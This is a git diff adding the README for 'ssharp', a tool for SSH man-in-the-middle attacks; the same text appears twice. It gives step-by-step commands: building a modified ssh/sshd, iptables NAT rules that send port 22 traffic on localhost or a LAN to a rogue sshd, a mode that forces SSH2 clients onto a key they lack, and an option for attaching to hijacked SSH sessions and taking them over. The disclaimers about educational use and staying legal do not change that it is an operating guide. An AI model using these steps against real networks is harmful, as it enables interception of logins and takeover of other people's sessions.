1 files changed, 81 insertions, 0 deletions
diff --git a/other/ssharp/README.ssharp b/other/ssharp/README.ssharp
new file mode 100644
index 0000000..33f1e6e
--- /dev/null
+++ b/other/ssharp/README.ssharp
@@ -0,0 +1,81 @@
+HOWTO
+=====
+1.
+Think! Only YOU are responsible for your own actions.
+Ssharp is provided 'AS IS' without any warranty.
+It is for educational and demonstration purposes only.
+The author is not responsible for any damage you might cause
+when using it.
+Ssharp is NOT for free distribution. It is derived from
+a BSD-like licensed software and you are NOT allowed to
+distribute it.
+2.
+Prefered prefix is /usr/local.
+(Edit ssharp.h to fit your OS and paths if needed)
+# configure; make ssh; make
+# make install
+3.
+# cp ssh /usr/local/bin/ssharpclient (or whatever your path is)
+(Assuming you already have a sshd package installed; make sure
+ssharp can find its hostkeys etc.)
+Disable RSA authentication.
+4.
+For localhost testing:
+# iptables -t nat -A OUTPUT -p tcp --sport 1000:5000 --dport 22 -j REDIRECT\
+  --to-port 10000
+For in-LAN testing:
+# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 10000 -i eth0
+# <redirect-magic> :)
+(maybe you need to specify different portranges if ssh clients come
+from src-port 30000+X)
+  
+5.
+# ./sshd -4 -p 10000
+6.
+Return to coding.
+If you want to use the SSH2-only MiM, add -7 switch to line seen at 5:
+# ./sshd -4 -p 10000 -7
+This will make sshd look which key (DSA or RSA) the client probably does
+not already have and will force it to use.
+If you have still some spare time, you may have a look at ssh-walk script.
+If having even more spare time you may want to compile ssharp with
+USE_MSS option and install the mss server and client into /usr/local/bin.
+Then ssharp will slip the session through a screen-like terminal
+which allows you to attach to hijacked SSH sessions. mss-server will
+create /tmp/ssharp-IP.PID socket which can be used as argument for
+mss-client. If PID is killed and someone attached to the mss-server
+before the legitimate client is killed and you own the session as
+the only one. TAKE CARE TO STAY LEGAL!!!
+mss can be found at http://stealth.7350.org/
+In urgent cases I may be reached through stealth@segfault.net.
+Stealth

diff --git a/other/ssharp/README.ssharp b/other/ssharp/README.ssharp new file mode 100644 index 0000000..33f1e6e --- /dev/null +++ b/other/ssharp/README.ssharp
@@ -0,0 +1,81 @@
	1	HOWTO
	2	=====
	3
	4	1.
	5
	6	Think! Only YOU are responsible for your own actions.
	7
	8	Ssharp is provided 'AS IS' without any warranty.
	9	It is for educational and demonstration purposes only.
	10	The author is not responsible for any damage you might cause
	11	when using it.
	12	Ssharp is NOT for free distribution. It is derived from
	13	a BSD-like licensed software and you are NOT allowed to
	14	distribute it.
	15
	16
	17	2.
	18
	19	Prefered prefix is /usr/local.
	20
	21	(Edit ssharp.h to fit your OS and paths if needed)
	22	# configure; make ssh; make
	23	# make install
	24
	25	3.
	26
	27	# cp ssh /usr/local/bin/ssharpclient (or whatever your path is)
	28
	29	(Assuming you already have a sshd package installed; make sure
	30	ssharp can find its hostkeys etc.)
	31
	32	Disable RSA authentication.
	33
	34	4.
	35
	36	For localhost testing:
	37
	38	# iptables -t nat -A OUTPUT -p tcp --sport 1000:5000 --dport 22 -j REDIRECT\
	39	--to-port 10000
	40
	41	For in-LAN testing:
	42
	43	# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 10000 -i eth0
	44	# <redirect-magic> :)
	45
	46	(maybe you need to specify different portranges if ssh clients come
	47	from src-port 30000+X)
	48
	49	5.
	50
	51	# ./sshd -4 -p 10000
	52
	53	6.
	54
	55	Return to coding.
	56
	57
	58	If you want to use the SSH2-only MiM, add -7 switch to line seen at 5:
	59
	60	# ./sshd -4 -p 10000 -7
	61
	62	This will make sshd look which key (DSA or RSA) the client probably does
	63	not already have and will force it to use.
	64
	65	If you have still some spare time, you may have a look at ssh-walk script.
	66
	67	If having even more spare time you may want to compile ssharp with
	68	USE_MSS option and install the mss server and client into /usr/local/bin.
	69	Then ssharp will slip the session through a screen-like terminal
	70	which allows you to attach to hijacked SSH sessions. mss-server will
	71	create /tmp/ssharp-IP.PID socket which can be used as argument for
	72	mss-client. If PID is killed and someone attached to the mss-server
	73	before the legitimate client is killed and you own the session as
	74	the only one. TAKE CARE TO STAY LEGAL!!!
	75	mss can be found at http://stealth.7350.org/
	76
	77	In urgent cases I may be reached through stealth@segfault.net.
	78
	79	Stealth
	80
	81